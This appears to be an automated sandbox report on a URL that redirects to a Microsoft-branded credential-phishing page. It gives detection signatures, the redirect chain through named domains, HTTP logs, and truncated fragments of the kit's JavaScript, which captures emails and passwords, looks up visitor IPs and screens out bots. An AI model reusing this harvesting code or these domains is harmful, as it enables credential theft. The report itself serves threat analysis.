Edit tour

Windows Analysis Report
https://www.clkmg.com/h4pussy/1ywq9a

Overview

General Information

Sample URL:https://www.clkmg.com/h4pussy/1ywq9a
Analysis ID:1653902
Infos:

Detection

Score:68
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Antivirus detection for URL or domain
AI detected suspicious Javascript
Javascript uses Clearbit API to dynamically determine company logos
Javascript uses Telegram API
Creates files inside the system directory
Deletes files inside the Windows folder
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML page contains hidden javascript code
Javascript checks online IP of machine
No HTML title found

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • chrome.exe (PID: 6644 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6776 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1948,i,15434814748562672815,12799368222423242180,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2260 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 2204 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.clkmg.com/h4pussy/1ywq9a" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://classntfst.shop/ne/Avira URL Cloud: Label: malware

Phishing

barindex
Source: https://oka.greenthreads.hr/Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The URL 'oka.greenthreads.hr' does not match the legitimate domain 'microsoft.com'., The domain 'greenthreads.hr' does not have any known association with Microsoft., The presence of a non-Microsoft domain with a Microsoft brand reference is suspicious., The input field 'Enter recipient email' could be used for phishing purposes, especially if the domain is not legitimate. DOM: 2.4.pages.csv
Source: 2.10..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://oka.greenthreads.hr/_next/static/chunks/pa... This script demonstrates several high-risk behaviors, including data exfiltration, obfuscated code, and dynamic code execution. It collects sensitive user information (email, password, IP address, user agent) and sends it to a Telegram bot, which is a strong indicator of malicious intent. The script also checks for bot activity and redirects users to a 'denied' page if detected. Overall, this script poses a significant security risk and should be treated as highly suspicious.
Source: https://oka.greenthreads.hr/_next/static/chunks/pages/index-c362d579fbf7a668.jsHTTP Parser: (self.webpackchunk_n_e=self.webpackchunk_n_e||[]).push([[405],{5557:function(e,t,n){(window.__next_p=window.__next_p||[]).push(["/",function(){return n(6616)}])},6616:function(e,t,n){"use strict";n.r(t);var a=n(5893),o=n(7294),s=n(7066),i=n(2568),r=n.n(i),l=n(9812),c=n.n(l);let u=()=>{let[e,t]=(0,o.usestate)(""),[n,i]=(0,o.usestate)(""),[l,u]=(0,o.usestate)(!1),[d,_]=(0,o.usestate)("/favicon.ico"),[p,m]=(0,o.usestate)("verify your email identity to continue."),[g,h]=(0,o.usestate)(!1),x=e=>{t(e.target.value)},b=t=>{if(t.preventdefault(),e.includes("@")){u(!0),m("verify email password");let t=e.split("@")[1];_("https://logo.clearbit.com/".concat(t))}else alert("please enter a valid email address.")},f=async t=>{if(t.preventdefault(),n.length<5){alert("password must be at least 5 characters long.");return}h(!0);try{let t=await s.z.get("https://api64.ipify.org?format=json").then(e=>e.data.ip),a=await s.z.post("https://rail-bot-production.up.railway.app/api/detect_bot",{user_agent:navigator.useragent,ip:t}),{is_b...
Source: https://oka.greenthreads.hr/_next/static/chunks/pages/index-c362d579fbf7a668.jsHTTP Parser: (self.webpackchunk_n_e=self.webpackchunk_n_e||[]).push([[405],{5557:function(e,t,n){(window.__next_p=window.__next_p||[]).push(["/",function(){return n(6616)}])},6616:function(e,t,n){"use strict";n.r(t);var a=n(5893),o=n(7294),s=n(7066),i=n(2568),r=n.n(i),l=n(9812),c=n.n(l);let u=()=>{let[e,t]=(0,o.usestate)(""),[n,i]=(0,o.usestate)(""),[l,u]=(0,o.usestate)(!1),[d,_]=(0,o.usestate)("/favicon.ico"),[p,m]=(0,o.usestate)("verify your email identity to continue."),[g,h]=(0,o.usestate)(!1),x=e=>{t(e.target.value)},b=t=>{if(t.preventdefault(),e.includes("@")){u(!0),m("verify email password");let t=e.split("@")[1];_("https://logo.clearbit.com/".concat(t))}else alert("please enter a valid email address.")},f=async t=>{if(t.preventdefault(),n.length<5){alert("password must be at least 5 characters long.");return}h(!0);try{let t=await s.z.get("https://api64.ipify.org?format=json").then(e=>e.data.ip),a=await s.z.post("https://rail-bot-production.up.railway.app/api/detect_bot",{user_agent:navigator.useragent,ip:t}),{is_b...
Source: https://oka.greenthreads.hr/HTTP Parser: Number of links: 0
Source: https://netro.gitcombust.shop/HTTP Parser: Base64 decoded: 1743522156.000000
Source: https://netro.gitcombust.shop/script.jsHTTP Parser: async function getuserip() { try { const response = await fetch('https://api64.ipify.org?format=json'); const data = await response.json(); return data.ip; } catch (error) { console.error('failed to get ip:', error); return '0.0.0.0'; // default ip in case of error }}// function to detect canvas fingerprintingfunction iscanvasblocked() { try { const canvas = document.createelement("canvas"); const ctx = canvas.getcontext("2d"); if (!ctx) return true; ctx.filltext("bot detection", 10, 10); return ctx.getimagedata(10, 10, 1, 1).data.length === 0; } catch (e) { return true; // if an error occurs, assume the canvas is blocked }}function detectbotlocally() { const botpatterns = [/bot/, /crawl/, /spider/, /scraper/, /python/, /httpclient/, /fetch/, /curl/]; const isbotuseragent = botpatterns.some(pattern => pattern.test(navigator.useragent.tolowercase())); c...
Source: https://oka.greenthreads.hr/_next/static/chunks/pages/index-c362d579fbf7a668.jsHTTP Parser: (self.webpackchunk_n_e=self.webpackchunk_n_e||[]).push([[405],{5557:function(e,t,n){(window.__next_p=window.__next_p||[]).push(["/",function(){return n(6616)}])},6616:function(e,t,n){"use strict";n.r(t);var a=n(5893),o=n(7294),s=n(7066),i=n(2568),r=n.n(i),l=n(9812),c=n.n(l);let u=()=>{let[e,t]=(0,o.usestate)(""),[n,i]=(0,o.usestate)(""),[l,u]=(0,o.usestate)(!1),[d,_]=(0,o.usestate)("/favicon.ico"),[p,m]=(0,o.usestate)("verify your email identity to continue."),[g,h]=(0,o.usestate)(!1),x=e=>{t(e.target.value)},b=t=>{if(t.preventdefault(),e.includes("@")){u(!0),m("verify email password");let t=e.split("@")[1];_("https://logo.clearbit.com/".concat(t))}else alert("please enter a valid email address.")},f=async t=>{if(t.preventdefault(),n.length<5){alert("password must be at least 5 characters long.");return}h(!0);try{let t=await s.z.get("https://api64.ipify.org?format=json").then(e=>e.data.ip),a=await s.z.post("https://rail-bot-production.up.railway.app/api/detect_bot",{user_agent:navigator.useragent,ip:t}),{is_b...
Source: https://oka.greenthreads.hr/HTTP Parser: HTML title missing
Source: https://oka.greenthreads.hr/HTTP Parser: HTML title missing
Source: https://netro.gitcombust.shop/HTTP Parser: No favicon
Source: https://netro.gitcombust.shop/HTTP Parser: No favicon
Source: https://oka.greenthreads.hr/HTTP Parser: No favicon
Source: https://oka.greenthreads.hr/HTTP Parser: No favicon
Source: https://oka.greenthreads.hr/HTTP Parser: No <meta name="author".. found
Source: https://oka.greenthreads.hr/HTTP Parser: No <meta name="author".. found
Source: https://oka.greenthreads.hr/HTTP Parser: No <meta name="copyright".. found
Source: https://oka.greenthreads.hr/HTTP Parser: No <meta name="copyright".. found
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: unknownHTTPS traffic detected: 52.11.99.233:443 -> 192.168.2.16:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.11.99.233:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.16:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.16:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.83.187.233:443 -> 192.168.2.16:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49727 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.72.100:443 -> 192.168.2.16:49728 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.16:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.16:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.24.57.1:443 -> 192.168.2.16:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.24.57.1:443 -> 192.168.2.16:49736 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.24.57.1:443 -> 192.168.2.16:49737 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.88.234:443 -> 192.168.2.16:49738 version: TLS 1.2
Source: unknownHTTPS traffic detected: 76.76.21.21:443 -> 192.168.2.16:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 76.76.21.21:443 -> 192.168.2.16:49752 version: TLS 1.2
Source: unknownHTTPS traffic detected: 76.76.21.21:443 -> 192.168.2.16:49753 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49761 version: TLS 1.2
Source: chrome.exeMemory has grown: Private usage: 0MB later: 39MB
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: patnero.thesilent.de to https://classntfst.shop/ne/
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: classntfst.shop to https://oka.greenthreads.hr
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 23.203.176.221
Source: unknownTCP traffic detected without corresponding DNS query: 23.203.176.221
Source: unknownTCP traffic detected without corresponding DNS query: 23.203.176.221
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.176.195
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.176.195
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.152.22
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.152.22
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.69.3
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.69.3
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.69.3
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.69.3
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.69.3
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.69.3
Source: global trafficHTTP traffic detected: GET /h4pussy/1ywq9a HTTP/1.1Host: www.clkmg.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /redir.cgi?url=5YLzHJtmmpWmacBzmzCY%2flX4xlmtZYa5OH2D9HeWNiho6ITfHFNLv4fgDcASlkcXru2gSFAsJp%2fzvbDs&pixel=0&lidc=1749346618 HTTP/1.1Host: www.clkmg.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: alc=1; vid=1157128538
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.clkmg.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.clkmg.com/redir.cgi?url=5YLzHJtmmpWmacBzmzCY%2flX4xlmtZYa5OH2D9HeWNiho6ITfHFNLv4fgDcASlkcXru2gSFAsJp%2fzvbDs&pixel=0&lidc=1749346618Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: alc=1; vid=1157128538
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: netro.gitcombust.shopConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://www.clkmg.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /styles.css HTTP/1.1Host: netro.gitcombust.shopConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://netro.gitcombust.shop/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /script.js HTTP/1.1Host: netro.gitcombust.shopConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://netro.gitcombust.shop/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.clkmg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: alc=1; vid=1157128538
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: netro.gitcombust.shopConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://netro.gitcombust.shop/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1Host: netro.gitcombust.shopConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/scripts/jsd/708f7a809116/main.js? HTTP/1.1Host: netro.gitcombust.shopConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/jsd/r/0.216127262788091:1743517896:WH6ejxtsVObjbtfWl3K5Ys8Re23onSxZleFLZs8jUh4/929932861ac41512 HTTP/1.1Host: netro.gitcombust.shopConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/redirect?expires=1743522173464&hash=699926820f0cfbefd342dd7de6b398bf922012dc19667b917ed417a8978ec069 HTTP/1.1Host: patnero.thesilent.deConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/get_doc_url HTTP/1.1Host: patnero.thesilent.deConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ne/ HTTP/1.1Host: classntfst.shopConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: oka.greenthreads.hrConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/css/19d09a6113afa007.css HTTP/1.1Host: oka.greenthreads.hrConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://oka.greenthreads.hr/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/webpack-ee7e63bc15b31913.js HTTP/1.1Host: oka.greenthreads.hrConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://oka.greenthreads.hr/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/framework-2c79e2a64abdb08b.js HTTP/1.1Host: oka.greenthreads.hrConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://oka.greenthreads.hr/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/main-de1ad41d606513c1.js HTTP/1.1Host: oka.greenthreads.hrConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://oka.greenthreads.hr/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/_app-aea6920bd27938ca.js HTTP/1.1Host: oka.greenthreads.hrConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://oka.greenthreads.hr/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/186-e401717d9e8b842b.js HTTP/1.1Host: oka.greenthreads.hrConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://oka.greenthreads.hr/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/index-c362d579fbf7a668.js HTTP/1.1Host: oka.greenthreads.hrConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://oka.greenthreads.hr/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/fUhIl0Hqd1aZXohaxqY8t/_buildManifest.js HTTP/1.1Host: oka.greenthreads.hrConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://oka.greenthreads.hr/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
